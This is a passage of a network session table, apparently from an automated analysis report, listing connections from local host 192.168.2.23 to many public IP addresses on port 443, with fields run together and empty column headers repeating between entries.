                                            11471192.168.2.2336622177.115.226.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11472192.168.2.2356150159.2.234.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11473192.168.2.2338696207.33.146.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11474192.168.2.2339460104.7.12.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11475192.168.2.2350414105.78.119.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11476192.168.2.2344154138.117.89.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11477192.168.2.235779688.67.217.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11478192.168.2.233549695.69.226.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11479192.168.2.2349922223.222.183.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11480192.168.2.234866053.235.147.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11481192.168.2.234944481.10.205.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11482192.168.2.2353046148.230.49.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11483192.168.2.235441820.60.228.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11484192.168.2.2357614123.208.5.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11485192.168.2.233972491.199.237.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11486192.168.2.233406248.4.95.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11487192.168.2.2338460222.40.24.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11488192.168.2.234282447.212.63.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11489192.168.2.234608014.127.196.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11490192.168.2.234434035.141.45.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11491192.168.2.234488248.5.162.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11492192.168.2.2341756139.245.170.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11493192.168.2.234994246.130.81.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11494192.168.2.234782858.245.119.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11495192.168.2.233802246.4.90.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11496192.168.2.2352788221.61.252.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11497192.168.2.235627083.27.143.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11498192.168.2.2345482123.253.156.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11499192.168.2.233435867.23.178.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11500192.168.2.2340258123.210.93.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11501192.168.2.235658441.57.149.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11502192.168.2.233736442.197.173.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11503192.168.2.2333228135.252.156.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11504192.168.2.2345968162.143.219.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11505192.168.2.2347472164.4.13.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11506192.168.2.2333892119.191.127.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11507192.168.2.234012069.161.35.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11508192.168.2.233477683.29.18.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11509192.168.2.2360352135.204.172.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11510192.168.2.2337856200.236.53.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11511192.168.2.233455680.120.249.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11512192.168.2.2332904159.101.111.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11513192.168.2.2340810206.212.218.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11514192.168.2.2349500192.112.139.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11515192.168.2.2359778210.95.190.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11516192.168.2.2346154220.187.175.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11517192.168.2.234694632.109.12.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11518192.168.2.23446884.97.38.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11519192.168.2.2339518217.156.133.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11520192.168.2.2345922179.9.179.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11521192.168.2.2332920142.150.50.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11522192.168.2.233457618.2.185.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11523192.168.2.2347246117.84.16.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11524192.168.2.235788441.107.58.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11525192.168.2.234009265.142.185.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11526192.168.2.2340794161.165.26.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11527192.168.2.2344936110.245.159.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11528192.168.2.2342766103.73.24.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11529192.168.2.2350764181.45.71.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11530192.168.2.234903495.77.158.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11531192.168.2.235997849.203.95.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11532192.168.2.2343864102.8.138.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11533192.168.2.2350424100.237.40.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11534192.168.2.234321039.108.216.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11535192.168.2.2360948132.232.244.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11536192.168.2.2333340217.210.40.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11537192.168.2.234453464.92.66.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11538192.168.2.2342788139.247.2.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11539192.168.2.234314647.201.197.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11540192.168.2.2351484210.117.130.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11541192.168.2.234758013.1.184.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11542192.168.2.234968451.84.148.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11543192.168.2.2358008217.111.45.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11544192.168.2.234633840.249.9.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11545192.168.2.2346330207.25.83.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11546192.168.2.2333746166.121.18.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11547192.168.2.234309814.37.76.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11548192.168.2.2352874181.43.23.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11549192.168.2.2340860201.82.69.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11550192.168.2.2355692175.191.196.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11551192.168.2.233404881.213.255.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11552192.168.2.235782631.168.110.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11553192.168.2.2346708147.216.220.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11554192.168.2.235532684.251.109.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11555192.168.2.2339824196.119.133.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11556192.168.2.2338198144.4.240.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11557192.168.2.235414482.111.244.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11558192.168.2.234666247.59.212.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11559192.168.2.233413253.173.90.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11560192.168.2.234982260.49.28.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11561192.168.2.2345602109.62.69.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11562192.168.2.235635867.241.7.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11563192.168.2.233448073.176.15.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11564192.168.2.2351652223.154.209.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11565192.168.2.2347690100.251.190.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11566192.168.2.2337774213.154.181.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11567192.168.2.234719481.114.46.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11568192.168.2.235477491.97.67.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11569192.168.2.233782297.218.226.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11570192.168.2.234971651.143.202.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11571192.168.2.234249664.207.22.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11572192.168.2.235388846.217.29.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11573192.168.2.2333670165.44.66.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11574192.168.2.2357866123.152.168.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11575192.168.2.235569280.153.9.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11576192.168.2.235129838.41.187.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11577192.168.2.2335232123.77.35.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11578192.168.2.2354154173.155.239.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11579192.168.2.235661291.30.246.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11580192.168.2.2352976211.47.6.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11581192.168.2.234994895.196.112.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11582192.168.2.2351410195.56.151.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11583192.168.2.235690466.231.128.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11584192.168.2.2341480161.185.81.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11585192.168.2.2352644216.19.136.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11586192.168.2.23565001.8.12.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11587192.168.2.233985899.167.11.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11588192.168.2.2350090130.186.148.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11589192.168.2.2344812197.103.79.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11590192.168.2.2347956201.157.114.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11591192.168.2.2349192118.238.116.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11592192.168.2.234078889.166.99.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11593192.168.2.2332794141.52.9.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11594192.168.2.233584097.184.145.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11595192.168.2.2354588119.21.71.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11596192.168.2.2360052197.114.252.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11597192.168.2.2347242195.182.77.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11598192.168.2.235703435.153.34.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11599192.168.2.2353248125.67.178.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11600192.168.2.2351512213.141.189.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11601192.168.2.2360986186.247.49.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11602192.168.2.2341262204.17.18.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11603192.168.2.2338114177.31.220.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11604192.168.2.2343630124.173.236.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11605192.168.2.2333996182.45.104.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11606192.168.2.235297493.100.81.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11607192.168.2.2350908205.57.231.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11608192.168.2.2335522132.82.31.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11609192.168.2.2344576182.105.25.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11610192.168.2.2338688103.62.196.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11611192.168.2.2354350180.64.42.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11612192.168.2.2360442143.138.106.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11613192.168.2.233330848.12.84.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11614192.168.2.2340484140.30.13.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11615192.168.2.2350814118.186.82.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11616192.168.2.235057223.172.118.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11617192.168.2.2336698145.135.177.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11618192.168.2.233922061.236.86.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11619192.168.2.2359184132.253.218.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11620192.168.2.234627093.166.91.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11621192.168.2.2351150138.253.170.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11622192.168.2.2343816193.87.47.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11623192.168.2.235518686.130.79.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11624192.168.2.235438038.165.27.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11625192.168.2.234502499.99.72.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11626192.168.2.235241070.29.34.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11627192.168.2.2335268207.44.114.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11628192.168.2.2334016176.148.157.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11629192.168.2.234446669.178.155.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11630192.168.2.2355606136.82.54.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11631192.168.2.233930867.79.233.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11632192.168.2.235149636.178.112.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11633192.168.2.233410264.55.252.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11634192.168.2.2354038111.47.255.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11635192.168.2.2348586201.75.38.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11636192.168.2.235546669.110.44.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11637192.168.2.2339760199.33.164.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11638192.168.2.2352712174.187.37.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11639192.168.2.2357704216.191.69.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11640192.168.2.234689672.198.119.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11641192.168.2.233657424.226.231.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11642192.168.2.2358450143.64.120.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11643192.168.2.235618837.108.250.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11644192.168.2.2336706210.169.0.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11645192.168.2.23599144.241.190.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11646192.168.2.2356458201.29.67.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11647192.168.2.235449490.20.253.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11648192.168.2.2358430186.30.222.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11649192.168.2.235837283.45.131.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11650192.168.2.2349312130.171.127.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11651192.168.2.2360996172.218.252.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11652192.168.2.235168838.101.237.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11653192.168.2.234839865.100.159.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11654192.168.2.2360252143.153.248.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11655192.168.2.233592247.110.87.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11656192.168.2.2358872113.122.45.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11657192.168.2.2340774173.248.226.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11658192.168.2.2336970112.150.215.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11659192.168.2.23602282.143.53.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11660192.168.2.234577225.78.214.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11661192.168.2.2335300135.168.160.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11662192.168.2.235668034.182.203.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11663192.168.2.235106482.231.137.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11664192.168.2.235929878.33.42.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11665192.168.2.2351898123.69.191.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11666192.168.2.2336562200.214.166.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11667192.168.2.2341614183.24.209.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11668192.168.2.2356640207.53.58.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11669192.168.2.233904619.162.79.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11670192.168.2.2339826112.89.50.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11671192.168.2.234081824.198.12.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11672192.168.2.2352304137.178.137.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11673192.168.2.2337780106.115.39.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11674192.168.2.2347546176.232.161.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11675192.168.2.235556688.160.142.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11676192.168.2.235431643.4.222.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11677192.168.2.2340660217.156.191.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11678192.168.2.234698891.60.87.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11679192.168.2.2350356187.225.0.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11680192.168.2.235874062.232.224.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11681192.168.2.233285814.55.227.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11682192.168.2.2340564130.217.251.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11683192.168.2.2346782119.35.165.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11684192.168.2.233542442.4.27.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11685192.168.2.2352236105.83.172.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11686192.168.2.233516620.63.170.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11687192.168.2.2343348207.75.4.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11688192.168.2.2347734220.117.116.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11689192.168.2.235744493.172.167.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11690192.168.2.2351484159.23.204.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11691192.168.2.2340378168.71.168.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11692192.168.2.233917637.225.253.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
